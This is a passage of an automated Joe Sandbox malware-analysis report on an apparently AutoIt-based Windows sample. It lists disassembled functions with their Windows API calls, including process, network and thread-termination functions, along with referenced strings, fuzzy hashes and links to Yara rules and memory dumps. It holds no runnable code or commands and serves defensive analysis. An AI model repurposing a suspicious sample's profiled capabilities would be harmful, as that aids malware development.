Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: 3eef041034c1f6443c1c074a4ab2be5403d77b4c582c01407199509d754b8d7d
Instruction ID: 2303ead49ae53af4df125e4175c5797abaa0c429dce9278b03d20a43c02512c1
Opcode Fuzzy Hash: 3eef041034c1f6443c1c074a4ab2be5403d77b4c582c01407199509d754b8d7d
Instruction Fuzzy Hash: CDF06D3224055CBFE3205BA29C0DEFB7A7CEFCAB11F000269FA04D1050EAA01A05A7B5

Function 00F67230 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,?), ref: 00F67243
EnterCriticalSection.KERNEL32(?,?,00F10EE4,?,?), ref: 00F67254
TerminateThread.KERNEL32(00000000,000001F6,?,00F10EE4,?,?), ref: 00F67261
WaitForSingleObject.KERNEL32(00000000,000003E8,?,00F10EE4,?,?), ref: 00F6726E

Part of subcall function 00F66C35: CloseHandle.KERNEL32(00000000,?,00F6727B,?,00F10EE4,?,?), ref: 00F66C3F

InterlockedExchange.KERNEL32(?,000001F6), ref: 00F67281
LeaveCriticalSection.KERNEL32(?,?,00F10EE4,?,?), ref: 00F67288

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: 1ef917fb8cf4f64d3aa794f87448298cba589d4c5ac0aa5764f4491a31c2f7c3
Instruction ID: 3adba22b04fc62c0cc0bd7ecb3c0a3239dfd1b14820fe7866a609fb4b0c24632
Opcode Fuzzy Hash: 1ef917fb8cf4f64d3aa794f87448298cba589d4c5ac0aa5764f4491a31c2f7c3
Instruction Fuzzy Hash: 95F05E36540616EFD7112B64ED4C9EB7729EF45712B100531F503A10A0DB7A5819EB50

Function 00F58992 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 00F5899D
UnloadUserProfile.USERENV(?,?), ref: 00F589A9
CloseHandle.KERNEL32(?), ref: 00F589B2
CloseHandle.KERNEL32(?), ref: 00F589BA
GetProcessHeap.KERNEL32(00000000,?), ref: 00F589C3
HeapFree.KERNEL32(00000000), ref: 00F589CA

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: 07c4a6683eb812edaf4c303597b5b18e04cc21b9c7003a538af203067e9a0251
Instruction ID: 98210cbed9a9b1b395ac69c2c48f6ba8d0334c326caaf5aef884e3bff8000aa1
Opcode Fuzzy Hash: 07c4a6683eb812edaf4c303597b5b18e04cc21b9c7003a538af203067e9a0251
Instruction Fuzzy Hash: C6E05276104509FFDA011FE5EC0C9AABB69FB89762B508631F219C1474CB329469EB50

Function 00F785ED Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00F78613
CharUpperBuffW.USER32(?,?), ref: 00F78722
VariantClear.OLEAUT32(?), ref: 00F7889A

Part of subcall function 00F67562: VariantInit.OLEAUT32(00000000), ref: 00F675A2
Part of subcall function 00F67562: VariantCopy.OLEAUT32(00000000,?), ref: 00F675AB
Part of subcall function 00F67562: VariantClear.OLEAUT32(00000000), ref: 00F675B7

Strings

AUTOIT.ERROR, xrefs: 00F78728
Incorrect Parameter format, xrefs: 00F7864B, 00F7880D

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4237274167-1221869570
Opcode ID: d2fe1fd438a8115c19e9cd769c01e6d033991ca7bf4f76c2c0de31d9eaa9c800
Instruction ID: a7a43ff49993297614a983764cf6b637f870494ccc7a5ab01052d807c941965c
Opcode Fuzzy Hash: d2fe1fd438a8115c19e9cd769c01e6d033991ca7bf4f76c2c0de31d9eaa9c800
Instruction Fuzzy Hash: FA918271A08301DFC710DF24C88495AB7E4EF89754F14896EF84A8B392DB34ED06EB52

Function 00F62A96 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00F1FC86: _wcscpy.LIBCMT ref: 00F1FCA9

_memset.LIBCMT ref: 00F62B87
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00F62BB6
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00F62C69
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00F62C97

Strings

0, xrefs: 00F62B73

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: ItemMenu$Info$Default_memset_wcscpy
String ID: 0
API String ID: 4152858687-4108050209
Opcode ID: 62e0fc78e2915f91876cfc4c223b846f510a921cb90b98ef5c1ad64d90598b2e
Instruction ID: 015d8299f2d8e7d47bb00ddfb7a39cb1cd53ceb34c6238b20ace81a76e311243
Opcode Fuzzy Hash: 62e0fc78e2915f91876cfc4c223b846f510a921cb90b98ef5c1ad64d90598b2e
Instruction Fuzzy Hash: EC51CC71A08B019ED7A49F28D845A6FB7E8EF99330F040A2DF881D72D1DB64DD44B792

Function 00F5D56C Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 121comlibraryloaderCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00F5D5D4
SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00F5D60A
GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00F5D61B
SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00F5D69D

Strings

DllGetClassObject, xrefs: 00F5D610

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: ErrorMode$AddressCreateInstanceProc
String ID: DllGetClassObject
API String ID: 753597075-1075368562
Opcode ID: bcb9b1539e24f7706c36efd3dd6a9b78094ba629b98eaeacde9b75919a2b0752
Instruction ID: 9a72959f535f749975b0378185b58832b5077b0cc4572ec4a8ba2814b5ac969b
Opcode Fuzzy Hash: bcb9b1539e24f7706c36efd3dd6a9b78094ba629b98eaeacde9b75919a2b0752
Instruction Fuzzy Hash: F741B1B1601204EFDF24DF14C884B9A7BA9EF48316F1581A9EE09DF205D7B0DD49EBA0

Function 00F62753 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00F627C0
GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00F627DC
DeleteMenu.USER32(?,00000007,00000000), ref: 00F62822
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00FC5890,00000000), ref: 00F6286B

Strings

0, xrefs: 00F627B5

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: Menu$Delete$InfoItem_memset
String ID: 0
API String ID: 1173514356-4108050209
Opcode ID: a13f42837034f9dcd6c4da03890a51328b9e95604660eac984bfbd9a20a5740e
Instruction ID: 68efe2426a89f8a357a0a21ce9bd39d2bf2c4681ed041cf47306d3a8ccaf0a55
Opcode Fuzzy Hash: a13f42837034f9dcd6c4da03890a51328b9e95604660eac984bfbd9a20a5740e
Instruction Fuzzy Hash: 3E41A071A047019FD760DF28CC44B6ABBE4EF85324F04492EF8A59B2D2D734A805EB62

Function 00F7D7A5 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00F7D7C5

Part of subcall function 00F0784B: _memmove.LIBCMT ref: 00F07899

Strings

none, xrefs: 00F7D8A0
winapi, xrefs: 00F7D836
stdcall, xrefs: 00F7D847
cdecl, xrefs: 00F7D81C

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: BuffCharLower_memmove
String ID: cdecl$none$stdcall$winapi
API String ID: 3425801089-567219261
Opcode ID: 2fbd62235f1ff83ec60ae37863dc0afcd528a66eb1f176150d069ce2edce229e
Instruction ID: d80ce44be29682b5a248fd00b148204d4c997b81e925d53675c93ecf50ff1ec6
Opcode Fuzzy Hash: 2fbd62235f1ff83ec60ae37863dc0afcd528a66eb1f176150d069ce2edce229e
Instruction Fuzzy Hash: 6931CF71904219AFCF00EF54CC919EEB3B5FF00320B50866AE829976D2DB75E905EF81

Function 00F58E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00F07DE1: _memmove.LIBCMT ref: 00F07E22

Part of subcall function 00F5AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00F5AABC

SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00F58F14
SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00F58F27
SendMessageW.USER32(?,00000189,?,00000000), ref: 00F58F57

Part of subcall function 00F07BCC: _memmove.LIBCMT ref: 00F07C06

Strings

ComboBox, xrefs: 00F58E9E
ListBox, xrefs: 00F58ED3

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: MessageSend$_memmove$ClassName
String ID: ComboBox$ListBox
API String ID: 365058703-1403004172
Opcode ID: 6d211b07cefebcbe5798b7de946b938c8322757eca66f79ed1a6b0d2959ebd80
Instruction ID: 55d620585d876fa126d6c1a004015008a59d1ffdebd2e6c80b0a9c99dd910003
Opcode Fuzzy Hash: 6d211b07cefebcbe5798b7de946b938c8322757eca66f79ed1a6b0d2959ebd80
Instruction Fuzzy Hash: D121F275A00208BEDB14ABA09C45DFFB7A9DF45360F104629F925A71E1DE39580EBA20

Function 00F7182D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00F7184C
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00F71872
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00F718A2
InternetCloseHandle.WININET(00000000), ref: 00F718E9

Part of subcall function 00F72483: GetLastError.KERNEL32(?,?,00F71817,00000000,00000000,00000001), ref: 00F72498
Part of subcall function 00F72483: SetEvent.KERNEL32(?,?,00F71817,00000000,00000000,00000001), ref: 00F724AD

Strings

, xrefs: 00F71893

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
String ID:
API String ID: 3113390036-3916222277
Opcode ID: 6e8841811489bb88ad796fcaa651d11b5a3093bfa4b31b2629371bb23ec0cf17
Instruction ID: 1ef1dd3814ebd881a4ac150fafee5fe00f89a20b68480acdcf53e90d77601ccb
Opcode Fuzzy Hash: 6e8841811489bb88ad796fcaa651d11b5a3093bfa4b31b2629371bb23ec0cf17
Instruction Fuzzy Hash: 4D217FB160020CBFEB119F68DC85FBF76ADFB48754F10812BF54996140DA249D09A7A2

Function 00F863E7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00F01D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00F01D73
Part of subcall function 00F01D35: GetStockObject.GDI32(00000011), ref: 00F01D87
Part of subcall function 00F01D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00F01D91

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00F86461
LoadLibraryW.KERNEL32(?), ref: 00F86468
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00F8647D
DestroyWindow.USER32(?), ref: 00F86485

Strings

SysAnimate32, xrefs: 00F8643C

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
String ID: SysAnimate32
API String ID: 4146253029-1011021900
Opcode ID: 88e8cde2d6283dcac26919d9793a5ac381c2a9a679654f6ea812e296d0d4e446
Instruction ID: 995b30274dea739af2c39a1a6839545541a126b918da1785b9598fff4d5fcebe
Opcode Fuzzy Hash: 88e8cde2d6283dcac26919d9793a5ac381c2a9a679654f6ea812e296d0d4e446
Instruction Fuzzy Hash: 38217971610209AFEF10AF64DC84EFA77A9EB58338F204629FA10D21A0D6719C81B760

Function 00F66D9C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 00F66DBC
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00F66DEF
GetStdHandle.KERNEL32(0000000C), ref: 00F66E01
CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00F66E3B

Strings

nul, xrefs: 00F66E36

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: 9e0d601f93c74276bec05fef7195e278e9df575b575a1514c5a9089f20b9d289
Instruction ID: 1ee895b69a30320e19803fc841777d8c56259f7518d572ea6228bcbf13539119
Opcode Fuzzy Hash: 9e0d601f93c74276bec05fef7195e278e9df575b575a1514c5a9089f20b9d289
Instruction Fuzzy Hash: 7621A175A00209AFDB209F29DC05BAA7BF8EF54730F204A29FCA0D72D0DB719955EB54

Function 00F66E6A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 00F66E89
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00F66EBB
GetStdHandle.KERNEL32(000000F6), ref: 00F66ECC
CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00F66F06

Strings

nul, xrefs: 00F66F01

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: 9f19cd1f95dfd5769590aa1da7cee98dbfcf0acba58a0cd5dd750739047df0cb
Instruction ID: 3a37d76088680c0978f8baa440b4c70b5bc187fae78bd314c23f719f8b08030c
Opcode Fuzzy Hash: 9f19cd1f95dfd5769590aa1da7cee98dbfcf0acba58a0cd5dd750739047df0cb
Instruction Fuzzy Hash: C621C279A007099FDB209F69DC04AAA77E8EF65730F200B19FCA0D72D0DB71A851EB54

Function 00F6AC40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00F6AC54
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00F6ACA8
__swprintf.LIBCMT ref: 00F6ACC1
SetErrorMode.KERNEL32(00000000,00000001,00000000,00F8F910), ref: 00F6ACFF

Strings

%lu, xrefs: 00F6ACBB

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: ErrorMode$InformationVolume__swprintf
String ID: %lu
API String ID: 3164766367-685833217
Opcode ID: 98f298376822d3471aff861e565e590ac088d669f37e11dcd36c5d8371a0360d
Instruction ID: 14cd4098821bc07e9aca991657a1d91d99d9d21b0d4e63f9c13b7d157a4b24cf
Opcode Fuzzy Hash: 98f298376822d3471aff861e565e590ac088d669f37e11dcd36c5d8371a0360d
Instruction Fuzzy Hash: 59218370A00109AFCB10EF65CD85DEE7BB8FF89714B004069F909EB252DB75EA55EB21

Function 00F61AE8 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00F61B19

Strings

REMOVE, xrefs: 00F61B1F
APPEND, xrefs: 00F61B52
EXISTS, xrefs: 00F61B41
KEYS, xrefs: 00F61B30

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: BuffCharUpper
String ID: APPEND$EXISTS$KEYS$REMOVE
API String ID: 3964851224-769500911
Opcode ID: fee731a897992d320f0ec950a73a1f10fa9440452c8b437f92780f008b182ff7
Instruction ID: c58c36e8d04b8c3f93731b40d78c7f7a950c1ffe4af0defbd3fc6004a71e561a
Opcode Fuzzy Hash: fee731a897992d320f0ec950a73a1f10fa9440452c8b437f92780f008b182ff7
Instruction Fuzzy Hash: F8113C319102198FCF00EF54DC919EEB7B4BF65314B5844A5D815A7292EB365906FF50

Function 00F7EB55 Relevance: 7.7, APIs: 5, Instructions: 247COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00F7EC07
GetProcessIoCounters.KERNEL32(00000000,?), ref: 00F7EC37
GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00F7ED6A
CloseHandle.KERNEL32(?), ref: 00F7EDEB

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: Process$CloseCountersHandleInfoMemoryOpen
String ID:
API String ID: 2364364464-0
Opcode ID: 0ed3aa74e44759093723d6b7aeea3d1aabc381d409ad065af36339710fcd0107
Instruction ID: 8a4a7c2890df940c21896661fb27fb7c471b12b5041324b3cab0fc12280a1541
Opcode Fuzzy Hash: 0ed3aa74e44759093723d6b7aeea3d1aabc381d409ad065af36339710fcd0107
Instruction Fuzzy Hash: 118184716047009FD720DF18CC46F6AB7E5AF48720F44C91EF9999B3D2D6B49C41AB42

Function 00F2541D Relevance: 7.7, APIs: 5, Instructions: 163COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 00F2547B
_memcpy_s.LIBCMT ref: 00F254ED
__read_nolock.LIBCMT ref: 00F2554B
__filbuf.LIBCMT ref: 00F2556E
_memset.LIBCMT ref: 00F255B2

Part of subcall function 00F28B28: __getptd_noexit.LIBCMT ref: 00F28B28

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
